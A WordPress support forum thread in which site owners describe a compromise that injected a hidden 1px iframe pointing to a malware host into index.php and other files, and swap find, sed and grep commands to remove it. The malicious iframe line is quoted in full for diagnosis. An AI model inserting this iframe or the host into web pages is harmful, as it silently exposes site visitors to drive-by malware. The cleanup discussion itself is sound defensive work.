WordPress.org

Ready to get started?Download WordPress

Forums

blank page, admin working (10 posts)

  1. Majklas
    Member
    Posted 1 year ago #

    somehow compromised my wordpress and ftp logins.. every site that has wordpress got hacked on same server.
    There was a line:

    <!-- . --><iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>
    <!-- . -->

    in each index.php (even https directory), wp-blog-header.php and (!!!) readme.html
    Thank's God a looser broke in and couldn't insert that code correctly, as index.php has no ?> at the very end. So I quickly found out the issue..
    How can I prevent this, is this some known wp backdoor? I've never experienced this before.. Now I have to search for this string and delete it.. FML

  2. esmi
    Forum Moderator
    Posted 1 year ago #

  3. Majklas
    Member
    Posted 1 year ago #

    Thank You esmi!
    One thing I located in home directory of the domain:

    [Code moderated. Please do not post hack code blocks in the forums. Please use the pastebin]

    still have no idea how it works.. But the mess have been cleaned up :)

  4. snshenoy
    Member
    Posted 1 year ago #

    Read a lot and found a simple trick. Several of my sites were affected. Download all files from http folder to a new folder on your desktop. call it 'domainnamecheck'. Do a search for one word from the malware script, in this case "ishigo". This will list all files, including html, php... Open those files using appropriate program and remove that iframe script from <!-- . --> to <!-- . -->. Hope this helps.

  5. snshenoy
    Member
    Posted 1 year ago #

    Just one Q: Can Google help stop redirect to that site?

  6. Majklas
    Member
    Posted 1 year ago #

    @snshenoy, well.. If you're using an advanced browser like FireFox,Chrome or Safari, You'll get a warning in red window to get the F* outta here :)

    Removing: I've done a quite simplier.. log on to my shell and looked for that iframe code and replaced it with a space ;) 3minutes and I'm clean..
    this would help you:
    find /start/path -name * -exec sed -ie 's/FOUNDTEXT/REPLACEDTEXT/g' '{}' \;
    FOUNDTEXT should be <iframe....
    REPLACEDTEXT must be a space or "".
    GoodLuck!

  7. snshenoy
    Member
    Posted 1 year ago #

    Thanks Majklas. How do I log in to my shell?

  8. Majklas
    Member
    Posted 1 year ago #

    Well, I're not experienced user, please do not go there :) Some things cannot be undone, that's why simple hosting companies doesn't give you shell-access. I've got my own server (from keyweb.de), so I can play there. Write an email with instructions to your server support/admin and they should help you.

  9. stevland
    Member
    Posted 1 year ago #

    Majklas,

    I've tried your code from an ssh shell, here's what it looked like:

    find /var/www/vhosts -name * -exec sed -ie 's/<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>/""/g' '{}' \;

    And here's what is returned:

    find: paths must precede expression
    Usage: find [path...] [expression]

    Any tips?

  10. ptnplanet
    Member
    Posted 1 year ago #

    Try this. It will recursively look through your current directory, searching for files containing the malware host and then replace the malware iframe with an empty string:

    grep -rl ishigo.sytes.net * | sed 's/ /\ /g' | xargs sed -i 's/<iframe width="1px" height="1px" src="http:\/\/ishigo.sytes.net\/openstat\/appropriate\/promise-ourselves.php" style="display:block;" ><\/iframe>//g'

    You can then verify the removal, by running

    grep -roh ishigo.sytes.net . | wc -w

    which should output 0 (no occurances of the malware host in any files in the current directory and any sub-directories)

Topic Closed

This topic has been closed to new replies.

About this Topic